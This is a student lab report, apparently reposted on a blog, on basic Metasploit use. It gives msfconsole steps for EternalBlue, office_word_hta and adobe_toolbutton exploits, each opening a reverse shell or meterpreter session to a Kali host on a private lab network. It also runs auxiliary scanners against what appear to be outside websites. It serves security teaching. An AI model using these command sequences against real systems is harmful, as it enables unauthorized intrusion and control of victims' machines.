NetSec2019 20165327 EXP5 MSF基础应用

一. 实践目标

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块(唯一)(0.5分)

①title
②trace
②copy_of_file
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

2 报告内容:

2.1.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.
exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。

payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即通过渗透攻击把攻击载荷运至靶机中。

Ecode:编码器,对代码进行异或、祛除坏字符及其他编码,保护攻击载荷不被发现。

2.2.实践总结与体会

2.3.离实战还缺些什么技术或步骤?

2.4.实践过程记录

1.1一个主动攻击实践,如ms08_067; (1分)

实际运用:ms17_010_eternalblue(简介:永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。)
攻击方:kali 192.168.118.130
靶机: win7 192.168.118.131
进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue。并且通过show payloads 显示可用攻击载荷。
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第1张
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第2张

设置tcp反向连接:set payload generic/shell_reverse_tcp
配置参数:
set LHOST 192.168.118.130
set LPORT 5327
set RHOST 192.168.118.131
set target 0//自动选择目标系统类型,匹配度较高
show options//查看设置是否正确
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第3张
exploit:监听开始
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第4张

控制成功在靶机目录下建个文件:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第5张

靶机方发现自己多了个不是自建的文件:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第6张

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

实际运用:office_word_hta
攻击方:kali 192.168.118.130
靶机: win7 192.168.118.131

启动msfconsole并使用模块use exploit/windows/fileformat/office_word_hta
查看目标show targets
show options
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第7张
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第8张
看到已经默认帮我们配置好了,我们只需要run执行即可,相应的产生了一个URL。
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第9张

在靶机的IE浏览器中输入KALI中生成的URL,出现一个窗口,点击运行即可:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第10张
看到kali那里已经产生了session会话,我们按下回车回到命令行,使用sessions -i 1来与第一个session建立连接,再输入shell拿到权限:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第11张
控制成功:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第12张

1.3 一个针对客户端的攻击,如Adobe;(1分)

实际运用:adobe_toolbutton
攻击方:kali 192.168.118.137(由热点变为校园网以后)
靶机: winxp 192.168.118.138
步骤:
use windows/fileformat/adobe_toolbutton
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.118.137 //攻击机ip
set LPORT 5327 //攻击端口
set FILENAME yjt5327.pdf //设置生成pdf文件的名字
exploit //生成文件
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第13张
(将生成的文件放到XP环境下,注意开始在root找不到文件,用Ctrl+h显示隐藏文件即可)

use exploit/multi/handler //使用监听模块
msfexploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.118.137 //攻击机ip
set LPORT 5327 //设置端口
exploit //监听

xp端用Adobe打开文件
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第14张

监听成功:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第15张

1.4 成功应用任何一个辅助模块。(0.5分)

在目录下找
/usr/share/metasploit-framework/modules/auxiliary/scanner/http
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第16张
1、title挺有意思(看似也容易做)
msfconsole
use auxiliary/scanner/http/title
info
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第17张

使用title对网站进行扫描;
exploit监听结果:
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第18张
一些网站对扫描进行了防范,而一些并没有。

②copy_of_file
作用:此模块标识特定路径可能存在的副本
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第19张

NetSec2019 20165327 EXP5 MSF基础应用 随笔 第20张
可见没有副本
③trace
检查主机是否易受跨站点跟踪的攻击
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第21张
NetSec2019 20165327 EXP5 MSF基础应用 随笔 第22张
两个网站均不意

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄